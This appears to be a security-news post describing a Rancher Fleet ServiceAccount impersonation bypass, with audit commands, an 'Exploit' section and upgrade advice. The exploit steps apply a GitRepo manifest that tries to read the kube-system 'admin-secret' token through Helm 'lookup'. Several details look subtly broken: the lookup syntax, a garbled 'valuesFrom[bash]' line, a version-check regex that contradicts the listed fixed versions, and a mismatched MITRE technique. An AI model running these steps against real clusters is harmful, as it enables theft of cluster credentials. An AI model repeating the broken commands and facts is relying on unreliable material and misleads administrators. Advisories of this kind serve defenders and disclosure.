Listen to this Post
Fleet’s Helm deployer fails to enforce ServiceAccount impersonation in two specific code paths, allowing a tenant with `git push` access to a monitored repository to read secrets from any namespace on any downstream cluster targeted by their GitRepo. The first bypass occurs in the Helm template engine: when a chart uses the `lookup` function, the underlying Kubernetes API query is executed with the fleet-agent’s cluster-admin credentials instead of the impersonated ServiceAccount, granting access far beyond the tenant’s RBAC scope. The second flaw resides in `fleet.yaml` helm.valuesFrom directives, where references to Secrets or ConfigMaps are read using the cluster‑admin client rather than the impersonated account, enabling a tenant to pull resources from namespaces they should never see. Both issues completely break Fleet’s multitenant impersonation boundary. Because the leaked credentials may belong to external services, the actual impact on confidentiality, integrity, and availability is non‑deterministic and depends entirely on the permissions of those leaked credentials. Single‑tenant deployments where all users are trusted are not affected.
Platform: Rancher Fleet
Version: <0.11.13,<0.12.14,…
Vulnerability : ServiceAccount impersonation bypass
Severity: Critical
date: 2026-05-07
Prediction: Already patched (see versions)
What Undercode Say:
Check if your Fleet version is vulnerable
fleet version | grep -E "v0.(1[0-2].[0-9]+|1[3-4].[0-9]+)" && echo "VULNERABLE: Upgrade to >=0.11.13, >=0.12.14, >=0.13.10, or >=0.14.5"
Verify that Helm operations use impersonation correctly
kubectl get gitrepo -A -o json | jq '.items[] | select(.spec.helm.valuesFrom != null)'
Audit all fleet.yaml files for cross-namespace valuesFrom references
find . -name "fleet.yaml" -exec grep -H "helm.valuesFrom" {} \;
List all Helm releases that contain 'lookup' calls in their templates
helm list --all-namespaces -o json | jq '.[] | .chart.metadata.name' | while read chart; do helm get manifest $chart | grep -q "lookup" && echo "$chart uses lookup"; done
Exploit:
Step 1: Create a malicious GitRepo that uses a Helm chart with a 'lookup' call
cat <<EOF | kubectl apply -f -
apiVersion: fleet.cattle.io/v1alpha1
kind: GitRepo
metadata:
name: malicious-repo
namespace: tenant-ns
spec:
repo: https://github.com/attacker/evil-chart
helm:
values:
secretData: "{{ lookup('kubernetes.io/v1/Secret', 'admin-secret', 'kube-system').data.token }}"
EOF
Step 2: The lookup bypass reads the token using fleet-agent's cluster-admin privileges
kubectl logs -n fleet-system deployment/fleet-agent | grep "lookup"
Step 3: For the valuesFrom bypass, craft a fleet.yaml with cross-namespace reference
helm.valuesFrom[bash].secretKeyRef.name: "kube-system/admin-secret"
Protection from this CVE
1. Upgrade immediately to Rancher v2.14.1, v2.13.5, v2.12.9, v2.11.13, or upgrade Fleet to `v0.11.13` (for Rancher v2.10.11).
2. Restrict `git push` access to Fleet‑monitored repositories to absolutely trusted users only.
3. Deploy `GitRepoRestriction` resources to limit which ServiceAccounts each namespace can impersonate.
4. Audit existing Helm charts for `lookup` calls and `fleet.yaml` files for cross‑namespace `valuesFrom` references as a detective control.
5. Assume any tenant with push access has already abused this flaw – rotate all secrets that may have been exposed, especially those in namespaces other than the tenant’s own.
Impact
– Confidentiality: High – an attacker can read arbitrary secrets from any namespace on every downstream cluster.
– Integrity: Variable – if the leaked credentials include write permissions to external services, integrity could be compromised.
– Availability: Low – the vulnerability itself does not directly cause denial of service, but credential theft could lead to downstream system disruption.
– MITRE ATT&CK: T1531 – Account Access Removal, as the attacker can effectively take over identities and remove legitimate access paths.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
